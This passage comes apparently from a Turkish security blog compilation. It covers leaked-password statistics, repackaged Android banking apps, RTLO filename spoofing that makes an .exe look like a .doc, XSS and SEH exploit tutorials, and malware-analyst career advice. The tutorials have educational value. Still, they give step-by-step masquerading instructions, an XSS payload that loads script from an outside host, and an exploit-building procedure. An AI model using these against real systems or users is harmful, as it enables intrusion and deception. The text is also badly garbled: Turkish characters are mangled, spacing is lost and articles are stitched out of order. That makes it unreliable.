65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 15: Hack 4 Career - 2011

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

